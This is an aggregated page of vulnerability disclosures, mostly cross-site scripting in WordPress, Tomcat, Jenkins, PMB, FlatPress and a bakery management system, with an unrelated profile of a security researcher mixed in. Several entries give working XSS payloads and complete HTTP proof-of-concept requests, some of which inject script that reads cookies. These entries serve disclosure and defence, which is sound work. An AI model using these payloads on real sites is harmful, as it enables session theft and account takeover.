A vulnerability was found in WP-Filebase Download Manager Plugin 3.4.4. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:01:18 +0100  

\------------------------------------------------------------------------
Cross-Site Scripting vulnerability in WP-Filebase Download Manager
WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WP-Filebase
Download Manager WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0019

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP-Filebase Download Manager
WordPress Plugin version 3.4.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross\_site\_scripting\_vulnerability\_in\_wp\_filebase\_download\_manager\_wordpress\_plugin.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Cross-Site Scripting vulnerability in WP-Filebase Download Manager WordPress Plugin** _Summer of Pwnage (Feb 28)_

CVE-2017-20097: Cross-Site Scripting vulnerability in WP-Filebase Download Manager WordPress Plugin

Hidden Talents : He was a competitive swimmer for many years.
Instrument of Choice : His fingers were made for the keyboard, but he used to play the trumpet.
5 pieces of entertainment for the rest of his life : The Office, World War Z, The Matrix, Breaking Bad, The Thick of It.

**Hidden Talents** : He was a competitive swimmer for many years.

**Instrument of Choice** : His fingers were made for the keyboard, but he used to play the trumpet.

**5 pieces of entertainment for the rest of his life** : The Office, World War Z, The Matrix, Breaking Bad, The Thick of It.

**Favorite non-profit** : RSPCA

**How he takes his tea** : Through his mouth

**Superpower** : Doesn’t suffer from hangovers

The first thing you should know about Callum Carney is that he doesn’t like talking about himself. Shy? Not necessarily. Quick witted and charming? Yes. However, Callum is best understood through his actions, rather than his words. Callum is just 23 years old and a budding security research prodigy. At a young age he has achieved great success finding bugs in organizations like Microsoft, Spotify, and Google. While he would never toot his own horn, Callum has made monumental contributions in protecting the cloud and has quickly gained a reputation with plenty of accolades to show for it.

Callum was a young, inquisitive boy with a high interest in computers when his Habbo account was hacked. Someone stole his coins, and he was left irritated, but curious as to how it happened (he fully admits this was his fault since his password was Callum123). This little seed of injustice would grow within him as his passion for computers expanded too. Throughout his school years, he recalls spending more time fixing other people’s computers than learning in the classroom.

Early on he stumbled upon a live stream demonstrating Cross-Site Scripting (XSS) which piqued his interest. His hacking aspirations became a reality at the first sight of a pop-up alert on screen saying, “You’ve been hacked!!!”

> **From that moment I was hooked. I’ve never actually been able to come off this rush. Security research is addictive.**

One time in a college computer class Callum was tinkering around on his laptop during a lesson. Bored, but still as curious as ever, Callum began trying to hack the lesson websites domain. He ended up finding a devastating bug and reported it under the guise of anonymity in hopes of avoiding an awkward encounter down the road. However, he forgot to update the shared URL which ended up exposing _he_ was a student at the college. At this point he was just 16. As he put it, there are bound to be small mistakes when you’re starting out, right? Unbeknownst to him, the company hosting the affected website was a subsidiary of the college. Their team replied asking for him to meet to discuss his findings. After much deliberation (even with his mother) and fears of great repercussions, he accepted the meeting. To his good fortune, he was not arrested (ethical hacking is still a gray area in the UK). Instead, the company had the foresight to take a risk. They offered him a position within the company and Callum has been a part of their team for six years now!

When he isn’t working his day job, Callum moonlights as a security researcher. This is where his work speaks for itself. As a multi-year Microsoft Most Valuable Researcher (MVR) Callum’s reputation cannot be ignored. Whilst he didn’t set out to hunt for vulnerabilities for big tech, he is proud of his impact.

> **I see the whole community and what this space is, as the last line of defense. Inside large companies there are a lot of processes, and smart people who develop them. It’s up to us to check and make sure there is nothing left over. And it’s our job to find it. I see it as the last line for cyber security.**

When it comes to guiding the next generation of researchers, Callum strongly believes this field is for anybody, and there is no better time to get in on the action than right now.

> **The number of resources available to learn about security is always growing. In my opinion it’s great to learn by reading previously disclosed issues and getting hands-on with applications in the real world by finding vulnerabilities to report in organizations that have defined security policies.**

Callum stressed not to get demotivated if you aren’t successful immediately. Rather, he suggested that whatever you’re testing is made by humans and humans make mistakes. Keep on pushing, but don’t get burned out. Some of his favorite bugs to find are the ones where the general user is none the wiser. Take for example the time he was robbed of his coins as a kid playing Habbo. He would have liked to be the person who figured out you could steal from others, fix it, and the user would have no clue there was even a threat. The same concept applies to his larger bug bounties.

> **Stop doubting what you’re doing or coming up with reasons not to do something. Give it a go.**

Despite not caring to share too many words about himself, he is quite witty, and quick with comebacks which brings out a sort of endearing quality about who he is deep down. Fellow researcher Wouter (@wtm\_offensi) is happy to tell us what he thinks of Callum. “_Callum and I met in person for the first time about four years ago. This was at an invite-only bug bounty event where he gave an impressive talk about some of his bug hunting findings and experiences. During that event and the events that followed in the years after, I got to know Callum as a young yet skilled researcher who is not only great fun to be around (who doesn’t like a good sense of British humor) but also knows when to work hard to deliver high impact bugs that get the job done. After working together and sharing our insights at some undisclosed hacking event we kept in touch online to share ideas on some of our findings. Sharing information with other researchers is not always the easiest thing to do, since most of us rely on bugs as a (main) source of income, yet Callum is always willing to help think things over as a sparring partner. Nowadays we occasionally collaborate on research related to Azure, to help each other forward and make the hunt for bugs more fun. Callum always seems to be able to find targets that are exciting to work on, e.g., potential targets. I’m a big fan of the man himself and his work_.”

Like WTM, we are huge fans of Callum (@callum\_infosec) and we cannot thank him enough for his amazing research and partnership with MSRC! Thank you for your contributions that help secure Microsoft customers.

A Man of Action: Meet Callum Carney

In Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 the Form authentication example in the examples web application displayed user provided data without filtering, exposing a XSS vulnerability.

**Package**

maven org.apache.tomcat:tomcat (Maven)

**Affected versions**

\>= 10.1.0-M1, <= 10.1.0-M16

\>= 10.0.0-M1, < 10.0.22

\>= 9.0.30, < 9.0.65

\>= 8.5.50, < 8.5.82

**Patched versions**

10.1.0-M17

10.0.22

9.0.65

8.5.82

GHSA-6j88-6whg-x687: Cross-site Scripting in Apache Tomcat

Jenkins Stash Branch Parameter Plugin 0.3.0 and earlier does not escape the name and description of Stash Branch parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

**Cross-site Scripting in Jenkins Stash Branch Parameter Plugin**

Moderate severity GitHub Reviewed Published Jun 24, 2022 • Updated Jul 5, 2022

GHSA-88r9-hfj2-54hv: Cross-site Scripting in Jenkins Stash Branch Parameter Plugin

Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the keyword text field under the publish blog module.

**Cross-site Scripting in Jfinal CMS**

Moderate severity GitHub Reviewed Published Jun 24, 2022 • Updated Jun 25, 2022

GHSA-9pvq-4cc7-24jg: Cross-site Scripting in Jfinal CMS

Multiple cross-site scripting (XSS) vulnerabilities in /bsms/?page=manage_account of Simple Bakery Shop Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Username or Full Name fields.

\# Description:

The Bakery Shop Management System is a simple web-based application platform for bakery shops that

can help them to manage their stocks and day-to-day transaction with their customers.

\# Vulnerability Name: Cross site scripting (XSS) in Simple Bakery Shop Management System

\# Vulnerable URL: http://localhost/bsms/?page=manage\_account

\# Parameters Vulnerable: Full Name, Username

\# Payload Used: "><script>alert("XSS")</script>

\# Steps to reproduce:

1\. Login with admin credential.

2\. Navigate to 'Manage Account'.

3\. Insert XSS payloads in input fields 'Full Name' and 'Username'.

4\. Click on Update.

5\. XSS payloads trigger automatically while user visits this page again.

\# References

Vendor URL: https://www.campcodes.com/

Software URL: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/

CVE-2022-32987: Simple Bakery Shop Management System in PHP MySQL

PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.

**PMB 7.3.10 - CVE-2022-34328**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser
*   Affected version : 7.3.10 >=

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Reflected ( Unauthentificated )

**POC**

There is an exemple with alert:

    GET /index.php?lvl=author_see&id=42691%27%7cecho%20%3E%3C/a%3E%3C/span%3E%3Cscript%3Ealert(1)%3C/script%3Ed5u3g%20ijwh7gefly%20%23xzwx HTTP/1.1
    Host: xxxxx.fr
    Cookie: PhpMyBibli-OPACDB=pmb_test; _ga=GA1.2.80710046205; __utmz=147501360.tmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147501632.2; PhpMyBibli-COOKIECONSENT=!pmbstatopac=true
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Linux"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close
    

**Preview**

**PMB 7.4.1 - CVE-XXX**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser by body parameter from POST request
*   Affected version : 7.4.1 (lasted)

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Reflected ( Unauthentificated )

**POC**

There is an exemple with alert:

    POST /pmb/opac_css/index.php?lvl=search_result&search_type_asked=extended_search HTTP/1.1
    Host: localhost
    Content-Length: 165
    Cache-Control: max-age=0
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/pmb/opac_css/index.php?lvl=index&search_type_asked=extended_search
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PhpMyBibli-OPACDB=bibli; PmbOpac-SESSNAME=PmbOpac; PmbOpac-SESSID=2044540279; PhpMyBibli-OPACDB=bibli; PhpMyBibli-DATABASE=bibli; rwtxt-domains=",68qr7xelmc"; PHPSESSID=gqhnot1fc67bn5he0bflumrbh7; pmb3619056675=gr56m1hb6qesp47kqnsfpf8qn6
    Connection: close
    
    add_field=&search%5B%5D=f_1&op_0_f_1=EXACT&field_0_f_1%5B%5D=gang&explicit_search=1&search_xml_file=search_fields&delete_field=&launch_search=1&page=&no_search=0&ij6fm%22%3e%3cscript%3ealert(1)%3c%2fscript%3evg9q6c4g1mk=1
    

**PMB 7.4.1 - CVE-XXX**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser by body parameter from POST request
*   Affected version : 7.4.1 (lasted)

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Stored ( Authentificated )

**POC**

There is an exemple with alert:

    POST /pmb/admin.php?categ=cms_editorial&sub=type&elem=article&action=save&id=3 HTTP/1.1
    Host: localhost
    Content-Length: 229
    Cache-Control: max-age=0
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/pmb/admin.php?categ=cms_editorial&sub=type&elem=article&action=edit&id=3
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PhpMyBibli-OPACDB=bibli; PhpMyBibli-DATABASE=bibli; PhpMyBibli-LOGIN=admin; PhpMyBibli-SESSNAME=PhpMyBibli; PhpMyBibli-SESSID=4768651558; filesTreeSaveStateCookie=0.506966344966034%2C0.506966344966034%2F0.20485223066281089%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2F0.5604307111281486%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2F0.5604307111281486%2F0.9885325597889434%2C0.506966344966034%2F0.21127644710407156%2F0.29958385610940796%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2F0.5519183400871519%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2F0.14825971714188912%2C0.506966344966034%2F0.20485223066281089%2F0.5972892199220485; rwtxt-domains=",68qr7xelmc"; PHPSESSID=gqhnot1fc67bn5he0bflumrbh7; pmb3619056675=gr56m1hb6qesp47kqnsfpf8qn6; pmb4768651558=oj4vh2ag1b0eonnsirg5rmvn09
    Connection: close
    
    cms_editorial_type_label=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cms_editorial_type_comment=%3Cscript%3Ealert%282%29%3C%2Fscript%3E&cms_editorial_type_page_selector=0&cms_editorial_type_page_var_selector=0&save_button=Enregistrer
    

**Preview**

CVE-2022-34328: GitHub - jenaye/PMB

Jenkins Pipeline: Input Step Plugin 448.v37cea_9a_10a_70 and earlier archives files uploaded for `file` parameters for Pipeline `input` steps on the controller as part of build metadata, using the parameter name without sanitization as a relative path inside a build-related directory, allowing attackers able to configure Pipelines to create or replace arbitrary files on the Jenkins controller file system with attacker-specified content.

CVE-2022-34177: Jenkins Security Advisory 2022-06-22

Stored XSS and SQL injection vulnerability in MaxBoard could lead to occur Remote Code Execution, which could lead to information exposure and privilege escalation.

**KISA 인터넷 보호나라&KrCERT**

\[나주본원\] (58324) 전라남도 나주시 진흥길 9 한국인터넷진흥원 대표번호 : 1433-25(수신자 요금 부담)

\[서울청사\] (05717) 서울시 송파구 중대로 135 (가락동) IT벤처타워 \[해킹ㆍ스팸개인정보침해 신고 118\]

Copyright(C) 2021 KISA. All rights reserved.

CVE-2021-26636: KISA 인터넷 보호나라&KrCERT

A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**FlatPress 1.2.1 - Stored XSS in the Blog Content**

A stored Cross Site Scripting (XSS) vulnerability exists in version 1.2.1 of the FlatPress application that allows for arbitrary execution of JavaScript commands.

**Steps to reproduce the vulnerability**

1.  Visit the FlatPress **Administration area**.
2.  Navigate to the **Entries** -> **Write Entry**.
3.  Enter any **Subject**.
4.  In the content area put the following payload:
    *   <script>alert(document.cookie)</script>

5.  Click the **Save&Continue** button.
6.  Stored XSS payload is triggered.

*   Also we can verify the stored XSS payload by navigating to the home page.

Discovered by Martin Kubecka, September 15 2021

Copy link

Member

** **azett** commented Oct 19, 2021**

Hi, thanks for reporting this.  
As legitimated site admin, it is okay to add custom HTML or JS to your page - the described behaviour is intended.  
Does your findings implicate a way to exploit this behaviour _without_ being logged in as site admin?  
Thanks and regards,  
Arvid

2 participants

Tag

#xss